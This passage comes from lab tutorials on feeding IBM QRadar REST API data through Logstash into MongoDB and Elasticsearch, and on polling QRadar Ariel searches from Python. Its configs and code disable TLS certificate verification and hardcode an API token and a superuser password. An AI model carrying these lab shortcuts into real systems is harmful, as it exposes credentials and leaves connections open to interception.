            urls => {
                qradar_log_sources_url => {
                    method => get
                    url => "https://192.168.56.144/api/config/event_sources/log_source_management/log_sources"
                    headers => {
                        SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac"
                    }
                }
            }
        }
}

The configuration options in the above snippet are exactly the same as the previous example. The only change made is in the urls option, in which we specify url as "https://192.168.56.144/api/config/event_sources/log_source_management/log_sources".

Filter

We have multiple goals in the filter stage.

One goal is similar to the previous example - we want to limit the fields that are returned by the QRadar REST API endpoint. To achieve this, we will leverage the Prune filter plugin.

The other goal is to craft the output event with the exact fields required by MongoDB. One such field is _id.

According to MongoDB documentation:

In MongoDB, each document stored in a collection requires a unique _id field that acts as a primary key. If an inserted document omits the _id field, the MongoDB driver automatically generates an ObjectId for the _id field.

In our case, an API request to the QRadar Log Sources REST API endpoint returns multiple fields in the JSON response including a unique ID for each Log Source. We need to add a field called _id to the output event with the value of the unique Log Source ID for each Log Source. To achieve this, we will leverage the Mutate filter plugin.

Note: A complete list of returned fields are provided on the QRadar Interactive API Documentation page corresponding to the endpoint.

filter {
        mutate {
                add_field => {
                    "_id" => "%{[id]}"
                }
        }
        prune {
                whitelist_names => ["^@timestamp$","^_id$","^name$","^description$","^creation_date$","^enabled$"]
        }
}

add_field is specified to add a new field to the output event. In the above snippet, we have specified "_id" as the new field to be added which contains the value in the Log Source ID field "%{[id]}" from the input event.
whitelist_names is specified to indicate the fields that must be included in the output event. It is to be noted that the field names must be mentioned as an array of regular expressions. In the above snippet, we have specified the _id, name, description, creation_date, and enabled fields to be included in the output event.

Output

Our goal in the output stage is to persist the processed event to a specific collection within a MongoDB database. To achieve this, we will leverage the Mongodb output plugin as mentioned in the pre-requisites. We will also print the event to the standard output (STDOUT) for debugging purposes. For this, we will leverage the Stdout output plugin.

output {
        stdout {}
        mongodb {
            id => "my_mongodb_plugin_id"
            collection => "qradar_log_sources"
            database => "qradar"
            uri => "mongodb://localhost:27017"
        }
}

id is specified to add a unique ID to the plugin configuration. In the above snippet, we have specified id as "my_mongodb_plugin_id". This is optional, but recommended.
collection is specified to indicate the MongoDB collection to store the documents. In the above snippet, we have specified collection as "qradar_log_sources". If the collection does not exist, it is automatically created.
database is specified to indicate the MongoDB database containing the collection of documents. In the above snippet, we have specified database as "qradar". If the database does not exist, it is automatically created.
uri is specified to indicate the MongoDB connection string used to connect to the MongoDB server. In the above snippet, we have specified uri as "mongodb://localhost:27017".

Running the Configuration

We can combine the above snippets to create the below configuration file.

input {
        http_poller
        {
            schedule => { cron => "* * * * *" }
            ssl_verification_mode => "none"
            urls => {
                qradar_log_sources_url => {
                    method => get
                    url => "https://192.168.56.144/api/config/event_sources/log_source_management/log_sources"
                    headers => {
                        SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac"
                    }
                }
            }
        }
}
filter {
        mutate {
                add_field => {
                    "_id" => "%{[id]}"
                }
        }
        prune {
                whitelist_names => ["^@timestamp$","^_id$","^name$","^description$","^creation_date$","^enabled$"]
        }
}
output {
        stdout {}
        mongodb {
            id => "my_mongodb_plugin_id"
            collection => "qradar_log_sources"
            database => "qradar"
            uri => "mongodb://localhost:27017"
        }
}

Assuming the above configuration file is saved as qradar-log-sources.conf, we can run it with Logstash using the command:

logstash -f /root/logstash-blog/qradar-log-sources.conf

Note: Please ensure that you specify the full path to the .conf file. By default, Logstash will attempt to find the .conf file in /usr/share/logstash/.

Note: If logstash is not found in the path, try using /usr/share/logstash/bin/logstash instead.

The output from Logstash is seen below. The output has been truncated considering the number of lines required to represent all the Log Sources.

{
          "enabled" => true,
       "@timestamp" => 2022-06-05T12:49:00.191668Z,
      "description" => "WindowsAuthServer Device",
    "creation_date" => 1550780844476,
             "name" => "Experience Center: WindowsAuthServer @ EC: TIGER-PC",
              "_id" => "1462"
}
{
          "enabled" => true,
       "@timestamp" => 2022-06-05T12:49:00.191702Z,
      "description" => "WindowsAuthServer device",
    "creation_date" => 1550780906185,
             "name" => "Experience Center: WindowsAuthServer @ EC: MachineA",
              "_id" => "1512"
}
{
          "enabled" => true,
       "@timestamp" => 2022-06-05T12:49:00.191769Z,
      "description" => "AWS CloudTrail",
    "creation_date" => 1549879441512,
             "name" => "Experience Center: AWS Syslog @ 192.168.0.17",
              "_id" => "912"
}
{
          "enabled" => true,
       "@timestamp" => 2022-06-05T12:49:00.191801Z,
      "description" => "Cisco IronPort",
    "creation_date" => 1552586738421,
             "name" => "Experience Center: Cisco IronPort @ 192.168.0.15",
              "_id" => "1112"
}
.
.
.

Similarly, we can verify that the data was stored in MongoDB by connecting to the server using the MongoDB Shell (mongosh). The outputs of various queries are seen below.

> use qradar
switched to db qradar

> show collections
qradar_log_sources

> db.qradar_log_sources.countDocuments()
21

> db.qradar_log_sources.findOne()
{
    _id: '1262',
    description: 'WindowsAuthServer device',
    creation_date: Long("1540394721928"),
    enabled: true,
    name: 'Experience Center: WindowsAuthServer @ 172.16.0.4',
    '@timestamp': '"2022-06-05T14:18:01.445500Z"'
}

> db.qradar_log_sources.find({description: "WindowsAuthServer device"})
[
  {
    _id: '1262',
    description: 'WindowsAuthServer device',
    creation_date: Long("1540394721928"),
    enabled: true,
    name: 'Experience Center: WindowsAuthServer @ 172.16.0.4',
    '@timestamp': '"2022-06-05T14:18:01.445500Z"'
  },
  {
    _id: '1562',
    description: 'WindowsAuthServer device',
    creation_date: Long("1550780938011"),
    enabled: true,
    name: 'Experience Center: WindowsAuthServer @ EC: MachineB',
    '@timestamp': '"2022-06-05T14:18:01.446069Z"'
  },
  {
    _id: '1512',
    description: 'WindowsAuthServer device',
    creation_date: Long("1550780906185"),
    enabled: true,
    name: 'Experience Center: WindowsAuthServer @ EC: MachineA',
    '@timestamp': '"2022-06-05T14:18:01.446357Z"'
  }
]

As seen in the above snippets, we can now perform queries, aggregations, and other operations on our BSON documents within the MongoDB database collection. Furthermore, we can integrate MongoDB with Business Intelligence (BI) platforms to produce automated reports and dashboards.

Example #3: QRadar Offenses to Elasticsearch

In the previous section, we managed to fetch QRadar Log Sources by making an API request, add a new _id field, and persist JSON data records as BSON documents within a MongoDB database collection.

In this section, we will focus on a more complex goal. Here, our goal is to capture a subset of SSH login violations from all the Offenses generated on QRadar and ship only those Offenses to an Elasticsearch index. The desired Offenses contain the phrase “Bad Username” within their description fields.

Input

Our goal in the input stage is to fetch raw JSON data from the QRadar Offenses REST API endpoint. Similar to the previous examples, we will leverage the Logstash Http_poller input plugin to make an HTTP request to the QRadar Console by supplying a valid SEC Token as a Header parameter.

input {
        http_poller
        {
            schedule => { cron => "* * * * *" }
            ssl_verification_mode => "none"
            urls => {
                qradar_rules_url => {
                    method => get
                    url => "https://192.168.56.144/api/siem/offenses"
                    headers => {
                        SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac"
                    }
                }
            }
        }
}

The configuration options in the above snippet are exactly the same as the previous examples. The only change made is in the urls option, in which we specify url as "https://192.168.56.144/api/siem/offenses".

Filter

Similar to the previous example, we have multiple goals in the filter stage.

First of all, we want to limit the Offenses to the desired subset of SSH login violations. As mentioned above, these Offenses contain the phrase “Bad Username” within their description fields. To achieve this, we will leverage a conditional statement using the regexp (=~) comparison operator. In this manner, only those events that match the criteria are allowed through. The remaining events hit the else block. Since we are not interested in the other Offenses, we simply ignore (or drop) them. To achieve this, we will leverage the Drop filter plugin.

Next, we can define all the required transformations on the event.

One goal is to convert the start_time timestamp from the default format (milliseconds since the UNIX epoch) to a more human readable format (ISO 8601). To achieve this, we will leverage the Date filter plugin.

Since our example revolves around capturing SSH login violations, it is valuable to capture the username associated with each Offense in a separate field. To achieve this, we will leverage the Mutate filter plugin. Similarly, we will leverage the same plugin to modify the description field to include the username.

The final transformation goal is similar to the previous examples - we want to limit the fields that are returned by the QRadar REST API endpoint. To achieve this, we will leverage the Prune filter plugin.

Note: A complete list of returned fields are provided on the QRadar Interactive API Documentation page corresponding to the endpoint.

filter {
        if [description] =~ "Bad Username" {
            date {
                match => ["start_time", "UNIX_MS"]
                target => "start_time"
            }
            mutate {
                add_field => {
                    "username" => "%{[offense_source]}"
                }
                replace => {
                    "description" => "Bad Username Detected - %{offense_source}"
                }
            }
            prune {
                whitelist_names => ["^id$","^magnitude$","^start_time$","^username$","^description$","^categories$"]
            }
        }
        else {
           drop {}
        }
}

match and target are used in conjunction to parse a timestamp value and store it into a target field. In the above snippet, we have specified "start_time" to be parsed as "UNIX_MS" (milliseconds since the UNIX epoch). By default, the plugin will output the timestamp in ISO 8601 format. Since we mentioned the same field name ("start_time") in target, the value will simply be overwritten.

Note: According to Logstash documentation, the @timestamp field of the event is updated if target is not specified alongside match.

add_field is specified to add a new field to the output event. In the above snippet, we have specified "username" as the new field which contains the value of "offense_source" from the input event.
replace is specified to replace the value of an existing field, or add the field if it does not exist. In the above snippet, we have specified "description" with a new value of "Bad Username Detected - %{offense_source}" in which the %{offense_source} is substituted with the actual username associated with the Offense.
whitelist_names is specified to indicate the fields that must be included in the output event. It is to be noted that the field names must be mentioned as an array of regular expressions. In the above snippet, we have specified the id, magnitude, start_time, username, description, and categories fields to be included in the output event.

Output

Our goal in the output stage is to persist the processed event to a specific index within Elasticsearch. To achieve this, we will leverage the Elasticsearch output plugin. We will also print the event to the standard output (STDOUT) for debugging purposes. For this, we will leverage the Stdout output plugin.

Note: Unlike the MongoDB output plugin, the Elasticsearch output plugin is available by default and does not require manual installation.

Note: Use the command /usr/share/logstash/bin/logstash-plugin list to display all the installed plugins.

output {
        stdout {}
        elasticsearch {
            index => "bad-username-offenses"
            document_id => "%{[id]}"
            hosts => "https://127.0.0.1:9200"
            user => "elastic"
            password => "luKCzUWSLiL=Ah7rUanu"
            cacert => "/etc/elasticsearch/certs/http_ca.crt"
        }
}

index is specified to indicate the Elasticsearch index to store the documents. In the above snippet, we have specified index as "bad-username-offenses". If the index does not exist, it is automatically created.
document_id is specified to indicate the value to be used as document ID for documents in the Elasticsearch index. In the above snippet, we have specified that the value in the Offense ID field ("%{[id]}") must be used as the document ID.
hosts is specified to indicate the address of the Elasticsearch server. In the above snippet, we have specified hosts as "https://127.0.0.1:9200".
user is specified to indicate the username to be used for authentication to the Elasticsearch cluster. In the above snippet, we have specified user as "elastic".

Note: According to Elastic, it is not recommended to use the elastic superuser unless full access to the cluster is absolutely required. On self-managed deployments, it is advised to use the elastic user to create users that have the minimum necessary roles or privileges for their activities.

password is specified to indicate the password to be used for authentication to the Elasticsearch cluster. In the above snippet, we have specified password as "luKCzUWSLiL=Ah7rUanu".
cacert is specified to indicate the full path of the .cer or .pem file to validate the Elasticsearch server’s certificate. In the above snippet, we have specified cacert as "/etc/elasticsearch/certs/http_ca.crt".

Running the Configuration

We can combine the above snippets to create the below configuration file.

input {
        http_poller
        {
            schedule => { cron => "* * * * *" }
            ssl_verification_mode => "none"
            urls => {
                qradar_rules_url => {
                    method => get
                    url => "https://192.168.56.144/api/siem/offenses"
                    headers => {
                        SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac"
                    }
                }
            }
        }
}
filter {
        if [description] =~ "Bad Username" {
            date {
                match => ["start_time", "UNIX_MS"]
                target => "start_time"
            }
            mutate {
                add_field => {
                    "username" => "%{[offense_source]}"
                }
                replace => {
                    "description" => "Bad Username Detected - %{offense_source}"
                }
            }
            prune {
                whitelist_names => ["^id$","^magnitude$","^start_time$","^username$","^description$","^categories$"]
            }
        }
        else {
           drop {}
        }
}
output {
        stdout {}
        elasticsearch {
            index => "bad-username-offenses"
            document_id => "%{[id]}"
            hosts => "https://127.0.0.1:9200"
            user => "elastic"
            password => "luKCzUWSLiL=Ah7rUanu"
            cacert => "/etc/elasticsearch/certs/http_ca.crt"
        }
}

Assuming the above configuration file is saved as qradar-offenses.conf, we can run it with Logstash using the command:

logstash -f /root/logstash-blog/qradar-offenses.conf

Note: Please ensure that you specify the full path to the .conf file. By default, Logstash will attempt to find the .conf file in /usr/share/logstash/.

Note: If logstash is not found in the path, try using /usr/share/logstash/bin/logstash instead.

The output from Logstash is seen below. The output has been truncated considering the number of lines required to represent all the Offenses.

{
             "id" => 16,
    "description" => "Bad Username Detected - pepsi",
       "username" => "pepsi",
     "start_time" => 2022-07-13T18:53:47.388Z,
     "categories" => [
        [0] "SSH Login Failed"
    ],
      "magnitude" => 4
}
{
             "id" => 15,
    "description" => "Bad Username Detected - paratha1",
       "username" => "paratha1",
     "start_time" => 2022-07-13T18:53:30.326Z,
     "categories" => [
        [0] "SSH Login Failed"
    ],
      "magnitude" => 4
}
{
             "id" => 14,
    "description" => "Bad Username Detected - paratha",
       "username" => "paratha",
     "start_time" => 2022-07-13T18:52:55.233Z,
     "categories" => [
        [0] "SSH Login Failed"
    ],
      "magnitude" => 4
}
.
.
.

Similarly, we can verify that the data was stored in Elasticsearch by making an API request to the Search API using curl. The output of the API request is seen below. The output has been truncated considering the number of lines required to represent all the Offenses.

> curl --cacert /etc/elasticsearch/certs/http_ca.crt -u elastic:luKCzUWSLiL=Ah7rUanu https://localhost:9200/bad-username-offenses/_search

{
  "took": 1,
  "timed_out": false,
  "_shards": {
    "total": 1,
    "successful": 1,
    "skipped": 0,
    "failed": 0
  },
  "hits": {
    "total": {
      "value": 7,
      "relation": "eq"
    },
    "max_score": 1,
    "hits": [
      {
        "_index": "bad-username-offenses",
        "_id": "16",
        "_score": 1,
        "_source": {
          "id": 16,
          "description": "Bad Username Detected - pepsi",
          "username": "pepsi",
          "start_time": "2022-07-13T18:53:47.388Z",
          "categories": [
            "SSH Login Failed"
          ],
          "magnitude": 4
        }
      },
      {
        "_index": "bad-username-offenses",
        "_id": "15",
        "_score": 1,
        "_source": {
          "id": 15,
          "description": "Bad Username Detected - paratha1",
          "username": "paratha1",
          "start_time": "2022-07-13T18:53:30.326Z",
          "categories": [
            "SSH Login Failed"
          ],
          "magnitude": 4
        }
      },
      {
        "_index": "bad-username-offenses",
        "_id": "14",
        "_score": 1,
        "_source": {
          "id": 14,
          "description": "Bad Username Detected - paratha",
          "username": "paratha",
          "start_time": "2022-07-13T18:52:55.233Z",
          "categories": [
            "SSH Login Failed"
          ],
          "magnitude": 4
        }
      },
      .
      .
      .
    ]
  }
}

As seen in the above snippet, we have our Offenses stored in an Elasticsearch index. We can now perform queries, aggregations, and other operations on our data. Furthermore, like MongoDB, we can integrate Elasticsearch with Business Intelligence (BI) platforms to produce automated reports and dashboards. A quick way to start visualizing Elasticsearch data is with Kibana.

Conclusion

In this tutorial, we learnt how to develop ETL pipelines on Logstash to programatically fetch raw data from QRadar REST APIs, apply processing, and output into various formats and destinations. To summarize:

We started by introducing ETL (extract, transform and load) and explained how it enables SOC teams to ingest data from different sources, fuse and correlate data, and produce actionable reports and dashboards. We also introduced Logstash, an open-source data pipeline that can help us achieve our ETL goals.

Then, we began our journey to understand Logstash pipeline configurations with three examples.

In the first example, we fetched all the Rules deployed on QRadar and routed them to the standard output (STDOUT). Here, in the input stage, we leveraged the Http_poller input plugin to make the REST API request to QRadar and fetch raw JSON data. In the filter stage, we leveraged the Prune filter plugin to whitelist only the required fields, and in the output stage, we leveraged the Stdout output plugin to print the processed event to STDOUT.

In the second example, we fetched all the Log Sources onboarded on QRadar and persisted them to a MongoDB database collection. Here, in the input stage, similar to the previous example, we leveraged the Http_poller input plugin to make the REST API request to QRadar and fetch raw JSON data. In the filter stage, we leveraged the Mutate filter plugin to add a new field (_id) to the output event. We also leveraged the Prune filter plugin to whitelist only the required fields. In the output stage, we leveraged the Mongodb output plugin to store the events as BSON documents within a MongoDB database collection. We connected to the MongoDB server using mongosh and ran a few queries to confirm that the data was properly persisted.

In the third example, we fetched all the Offenses created on QRadar and persisted them to an Elasticsearch index. Here, in the input stage, similar to the previous examples, we leveraged the Http_poller input plugin to make the REST API request to QRadar and fetch raw JSON data. In the filter stage, we leveraged conditional statements to limit the Offenses to a subset of SSH login violations. Then, we leveraged the Date filter plugin to parse the start_time timestamp and convert it from Unix time to ISO 8601. We also leveraged the Mutate filter plugin to capture the username associated with each Offense in a separate field, and to modify the description field to include the username. We also leveraged the Prune filter plugin to whitelist only the required fields. In the output stage, we leveraged the Elasticsearch output plugin to store the events as documents within an Elasticsearch index. To verify that the data was properly persisted, we sent a GET request to the Elasticsearch Search API using curl to fetch all the Offenses.

Using the examples discussed in this tutorial, you can easily write new Logstash configurations and leverage the vast plethora of available plugins to perform all kinds of ETL operations. In the SOC, you can modify these examples to fetch data from your other systems (such as SIEM, SOAR, EDR, and Vulnerability Management, among many others) and integrate your destinations with Business Intelligence (BI) tools and platforms to automate SOC reporting.

I hope you enjoyed reading this tutorial. Please reach out via email if you have any questions or comments.

Qradar Aql Search Rest Api

2022-01-09T00:00:00+00:00

Introduction

In this tutorial, we will learn how to leverage the QRadar Ariel Search REST API endpoints to run Ariel searches and fetch their results programmatically using Python.

Note: This tutorial assumes you have admin access to a live QRadar deployment. For the purpose of this tutorial, I am using QRadar Community Edition. Please follow my step-by-step guide - How to install IBM QRadar CE V7.3.3 on VirtualBox to get a basic QRadar deployment up and running in your lab environment.

Note: This tutorial also assumes you have some experience with QRadar REST APIs and Python scripting. Please follow my step-by-step guide - QRadar REST APIs with Python to setup your Python environment with pip and Jupyter Notebook, generate a QRadar API Token, and write simple Python scripts which demonstrate how to make REST API requests to QRadar.

Pre-requisites

QRadar with admin access

I am using QRadar CE V7.3.3 as described above.
QRadar API Token

On QRadar, the API Token is also known as a SEC Token and must be generated by the admin on the QRadar Console. Please refer here for more information.
Python 3.x.x

I am using Python 3.9.7 on my MacBook Pro with macOS Big Sur.

The code written in this tutorial might cause issues with Python 2. Please refer to Python.org to download the latest release of Python 3 for your OS.
pip (Python Package Installer)

pip is a useful utility to install Python packages. I am using pip 21.2.4. If your Python environment does not have pip installed by default, please refer to the pip Installation documentation.
Install the following Python packages using pip:

requests

pip install requests
pandas

pip install pandas
jupyter

pip install jupyter

Searching in QRadar

Searching in QRadar is a basic but essential functionality. For instance, if a new Offense is created, you will ultimately navigate to the Log Activity tab to investigate associated Events as seen in the screenshot below. Although the filters are automatically applied, it is fundamentally executing an Ariel search in the background.

Furthermore, SOC Analysts also leverage the search functionality to proactively query the SIEM against Indicators of Compromise (IoCs), Hacker Tactics, Techniques, and Procedures (TTPs), and other malicious behaviors to determine the presence of cyber threats. This is known as Threat Hunting.

SIEM Administrators also rely upon the search functionality to ensure that the system is running as expected. Common use-cases include examining Events to ensure that necessary fields are correctly parsed, and calculating the Events per Second (EPS) consumption of onboarded Log Sources.

QRadar Ariel Search

In this section, we will start by dissecting the high-level steps involved in running a new QRadar Ariel Search programmatically. Then, we will move onto the various QRadar Ariel Search REST API endpoints and their specifications including parameters and responses. Finally, we will write Python code to implement the concepts and retrieve the result of a QRadar Saved Search titled Top Log Sources.

Workflow

Let us understand the high-level steps involved in running a new QRadar Ariel Search programmatically. They are:

1. Create a new QRadar Ariel Search using a Saved Search ID or AQL Query

We start by creating a new REST API request. You can either provide a raw AQL Query or a Saved Search ID within the REST API request for QRadar to execute.

According to IBM QRadar documentation:

The Ariel Query Language (AQL) is a structured query language that you use to communicate with the Ariel databases. Use AQL to query and manipulate event and flow data from the Ariel database.

According to IBM QRadar documentation:

You can save configured search criteria so that you can reuse the criteria and use the Saved Search criteria in other components, such as reports. Saved Search criteria does not expire.

Using the Saved Search ID is preferred when you want to perform the same Ariel Search without modifying its associated AQL Query.

For example: Top Log Sources in the last 6 Hours.

There is no need for a SIEM Administrator to modify the AQL Query associated with the above Saved Search if they intend to run it every 6 hours. In this case, using the Saved Search ID corresponding to that AQL Query is the best approach.

Using the raw AQL Query is preferred when you cannot save the AQL Query as a Saved Search. This occurs when the AQL Query is dynamically created.

For example: Login Failures for User {XYZ}.

Assume we have a list of usernames as follows:

tom
anthony
raj

Our goal is to search QRadar for “Login Failure” Events for each user. The AQL Query will likely need to be modified with each username as follows:

... WHERE username ILIKE '%tom%'
... WHERE username ILIKE '%anthony%'
... WHERE username ILIKE '%raj%'

It does not make sense to save each AQL Query as a separate Saved Search. Instead, it is easier to dynamically construct the AQL Query at runtime with the username.

2. A Search ID for the new QRadar Ariel Search is returned

Once the above request is created with the Saved Search ID or AQL Query, a response is returned with a unique Search ID.

3. Use Search ID to check status of QRadar Ariel Search

We utilize the returned Search ID to create a new REST API request to retrieve the status of the QRadar Ariel Search.

The goal is to determine if the QRadar Ariel Search has completed execution.

There are multiple factors which affect the performance of a QRadar Ariel Search. Some searches are likely to take longer considering the complexity and duration of the AQL Query. In practice, the recommended approach is to continuously poll the REST API for the status of the QRadar Ariel Search at defined intervals. You can define the interval as 30 seconds, 1 minute, 5 minutes, 10 minutes, or longer based on previous knowledge and experience.

Note: Run the AQL Query or Saved Search manually at least once on the QRadar Console to approximately determine its execution time.

4. Use Search ID to retrieve result once QRadar Ariel Search is Completed

Once it is determined that the QRadar Ariel Search is successfully completed, we can create a new REST API request with the Search ID to retrieve the result.

The below diagram summarizes the workflow and its steps:

QRadar Ariel Search REST API Endpoints

Let us understand the various QRadar Ariel Search REST API endpoints and their specifications, which will allow us to complete all the steps in the above workflow. They are:

1. Find QRadar Ariel Saved Searches

It was mentioned above that we can create a new QRadar Ariel Search using a Saved Search ID or an AQL Query. If you want to proceed with Saved Search ID, you will need to first query QRadar and capture the correct Saved Search ID for the desired search/AQL Query.

The /ariel/saved_searches REST API endpoint can be used to retrieve a list of existing Saved Searches on QRadar. As seen in the screenshot below, a GET request to /ariel/saved_searches returns many useful fields including the name of the Saved Search, its ID, and its corresponding AQL Query.

Below is a sample JSON snippet displaying the name, id, and aql fields for a Saved Search titled Top Log Sources.

{
  "name": "Top Log Sources",
  "id": 2721,
  "aql": "SELECT logsourcename(logSourceId) AS 'Log Source', UniqueCount(\"sourceIP\") AS 'Source IP (Unique Count)', UniqueCount(\"destinationIP\") AS   'Destination IP (Unique Count)', UniqueCount(\"destinationPort\") AS 'Destination Port (Unique Count)', UniqueCount(qid) AS 'Event Name (Unique Count)',   UniqueCount(category) AS 'Low Level Category (Unique Count)', UniqueCount(\"protocolId\") AS 'Protocol (Unique Count)', UniqueCount(\"userName\") AS   'Username (Unique Count)', MAX(\"magnitude\") AS 'Magnitude (Maximum)', SUM(\"eventCount\") AS 'Event Count (Sum)', COUNT(*) AS 'Count' from events GROUP   BY logSourceId order by \"Event Count (Sum)\" desc last 6 hours"
}

It is to be noted that making a GET request to /ariel/saved_searches will return an Array of JSON objects. To make it easier, we can consider using a filter within the GET request. As seen in the screenshot below, the REST API endpoint has an optional Query parameter called filter, which can be used to limit the response to a specific Saved Search or a subset of Saved Searches. Similarly, the fields optional Query parameter can be used to specify which fields should be returned in the query response.

2. Create QRadar Ariel Search

To create a new QRadar Ariel Search, make a POST request to the /ariel/searches REST API endpoint. As seen in the screenshot below, there are 2 optional Query parameters - query_expression and saved_search_id, corresponding to the AQL Query and Saved Search ID respectively. Depending on the selected approach, provide an appropriate value.

The request will return a JSON response containing a unique Search ID. Below is a sample JSON snippet displaying the search_id field.

{
  "search_id": "fdd8c0be-c88b-43fe-a3fd-6f88abfb9046"
}

3. Check Status of QRadar Ariel Search

Once a new QRadar Ariel Search is created, its unique Search ID can be used to check the completion status. To retrieve the status of a created search, make a GET request to /ariel/searches/{search_id} by replacing {search_id} with the actual Search ID associated with the search. As seen in the screenshot below, search_id is a required Path parameter to be sent along with the request.

If we replace search_id with the Search ID from the previous snippet, the request URL would look like:

/ariel/searches/fdd8c0be-c88b-43fe-a3fd-6f88abfb9046

The request will return a JSON response containing many fields pertaining to the status of the search. Below is a sample JSON snippet of the response displaying the progress, query_execution_time, and status fields.

{
  "progress": 46,
  "query_execution_time": 1480,
  "status": "COMPLETED"
}

4. Get Result of QRadar Ariel Search

Once it is ascertained that the QRadar Ariel Search is completed, make a GET request to /ariel/searches/{search_id}/results to retrieve the result of the search by replacing {search_id} with the actual Search ID associated with the search. As seen in the screenshot below, search_id is a required Path parameter to be sent along with the request. It is also worth noting that the result can be retrieved in various formats. The Accepts request header indicates the format of the result. The formats are RFC compliant and can be JSON, CSV, XML, or tabular text.

Below is a sample JSON snippet of the response displaying the fields specified in the AQL Query associated with the QRadar Ariel Search.

"events": [
  {
    "Log Source": "Health Metrics-2 :: localhost",
    "Source IP (Unique Count)": 1.0,
    "Destination IP (Unique Count)": 1.0,
    "Destination Port (Unique Count)": 1.0,
    "Event Name (Unique Count)": 1.0,
    "Low Level Category (Unique Count)": 1.0,
    "Protocol (Unique Count)": 1.0,
    "Username (Unique Count)": 0.0,
    "Magnitude (Maximum)": 4.0,
    "Event Count (Sum)": 30040.0,
    "Count": 30040.0
  },
  .
  .
  .
]

It is to be noted that the request will mostly return an Array of JSON objects. In the snippet above, events is an Array containing raw JSON objects, each pertaining to a specific Log Source.

The fields returned in the response are solely dependent on the AQL Query associated with the QRadar Ariel Search. We can see that all the fields returned in the JSON response above are specified in the SELECT statement of the AQL Query below.

SELECT   logsourcename(logSourceId)     AS 'Log Source',
         UniqueCount("sourceIP")        AS 'Source IP (Unique Count)',
         UniqueCount("destinationIP")   AS 'Destination IP (Unique Count)',
         UniqueCount("destinationPort") AS 'Destination Port (Unique Count)',
         UniqueCount(qid)               AS 'Event Name (Unique Count)',
         UniqueCount(category)          AS 'Low Level Category (Unique Count)',
         UniqueCount("protocolId")      AS 'Protocol (Unique Count)',
         UniqueCount("userName")        AS 'Username (Unique Count)',
         MAX("magnitude")               AS 'Magnitude (Maximum)',
         SUM("eventCount")              AS 'Event Count (Sum)',
         COUNT(*)                       AS 'Count'
FROM     events
GROUP BY logSourceId
ORDER BY "Event Count (Sum)" DESC 
LAST 6 HOURS

Python Code

We will use the programming concept of recursion to implement the QRadar Ariel Search workflow on Python.

According to GeeksforGeeks:

The process in which a function calls itself directly or indirectly is called recursion and the corresponding function is called as recursive function. Using recursive algorithm, certain problems can be solved quite easily. Examples of such problems are Towers of Hanoi (TOH), Inorder/Preorder/Postorder Tree Traversals, DFS of Graph, etc.

We will start by importing the necessary Python packages as seen below.

import requests
import pandas
import time

The next step is to define a variable called SEC_TOKEN to hold the QRadar API Token as seen below. Please refer here on how to generate a QRadar API Token.

SEC_TOKEN = '4150d602-11ba-4d55-b3de-b6ebfe8b93ac'

The next step is to define a variable called header to hold the Header content for the API request as seen below. We will utilize the SEC_TOKEN variable that was defined above as a value to the key SEC.

header = {
    'SEC':SEC_TOKEN,
    'Content-Type':'application/json',
    'accept':'application/json'
}

After the variables have been defined, we will define 2 functions as follows:

1. `do_request` function

This function is responsible for making the actual REST API request using the requests Python module as seen below. It takes the HTTP method, request URL, and request parameters as function arguments and returns the JSON response. It is generic by design to promote re-usability and reduce the lines of code.

Note: params in this function is an example of a default parameter which allows us to specify a default value for the parameter in case we do not pass an argument. By default, params will take the value of {} which is an empty dictionary unless a value is explicitly passed as an argument.

def do_request(method, url, params={}):
    r = requests.request(method=method, url=url, params=params, headers=header, verify=False)
    return r.json()

2. `check_status` function

This function is the recursive function responsible for checking the status of the QRadar Ariel Search at a defined interval of 3 seconds as seen below. The function will return the JSON response once the search is completed.

The base case in the function is when the variable search_status is set to COMPLETED. In the base case, the do_request function is called to retrieve the result of the QRadar Ariel Search.

When search_status is set a value other than COMPLETED, the recursive case is triggered and the same function (check_status) calls itself. First, we use time.sleep(3) to suspend the execution for 3 seconds. Then, the do_request function is called to fetch the status of the QRadar Ariel Search. The status of the search, accessed via resp_json['status'], is used as an argument in the recursive function call.

The recursive function calls are repeated until the base case is satisified i.e., when search_status="COMPLETED", which then stops the recursion and retrieves the result of the search. Our goal is to ensure that the base case is triggered successfully, else the function will call itself over and over endlessly resulting in infinite recursion.

def check_status(search_status, search_id):
    if search_status=="COMPLETED":
        print("Search Completed")
        method = "GET"
        url = 'https://192.168.56.144/api/ariel/searches/%s/results' % search_id
        return do_request(method, url)
    else:
        print("Waiting for 3 seconds...")
        time.sleep(3)
        method = "GET"
        url = 'https://192.168.56.144/api/ariel/searches/%s' % search_id
        resp_json = do_request(method, url)
        return check_status(resp_json['status'], search_id)

According to IBM QRadar documentation:

The search status value be one of: WAIT, EXECUTE, SORTING, COMPLETED, CANCELED, or ERROR.

It is to be noted that we are only considering COMPLETED as the base case in our code for the sake of simplicity. A more concrete implementation of this function will likely have more base cases in the recursive function to consider CANCELED and ERROR search statuses.

According to MIT:

A recursive implementation may have more than one base case, or more than one recursive step. For example, the Fibonacci function has two base cases, n=0 and n=1.

The next step is to utilize the above 2 defined functions to perform a new QRadar Ariel Search and display its result. Let us attempt to perform the Saved Search titled Top Log Sources.

To capture the correct Saved Search ID associated with the Top Log Sources Saved Search, we will define the request URL and request parameters as seen below.

url = 'https://192.168.56.144/api/ariel/saved_searches'
params = {'filter':'name="Top Log Sources"'}
type(params)
# dict

params is a dictionary with a single key called filter. The associated value is name="Top Log Sources". It is important to note the double quotes encapsulating the Saved Search name.

The next step is to make a GET request using our previously defined function do_request as seen below. The result is stored in a variable called res_json.

method = "GET"
res_json = do_request(method, url, params)
res_json
'''
[{'owner': 'admin',
  'is_dashboard': True,
  'description': '',
  'creation_date': 1245191315681,
  'uid': 'SYSTEM-13',
  'database': 'EVENTS',
  'is_default': False,
  'is_quick_search': True,
  'name': 'Top Log Sources',
  'modified_date': 1622547778276,
  'id': 2721,
  'is_aggregate': True,
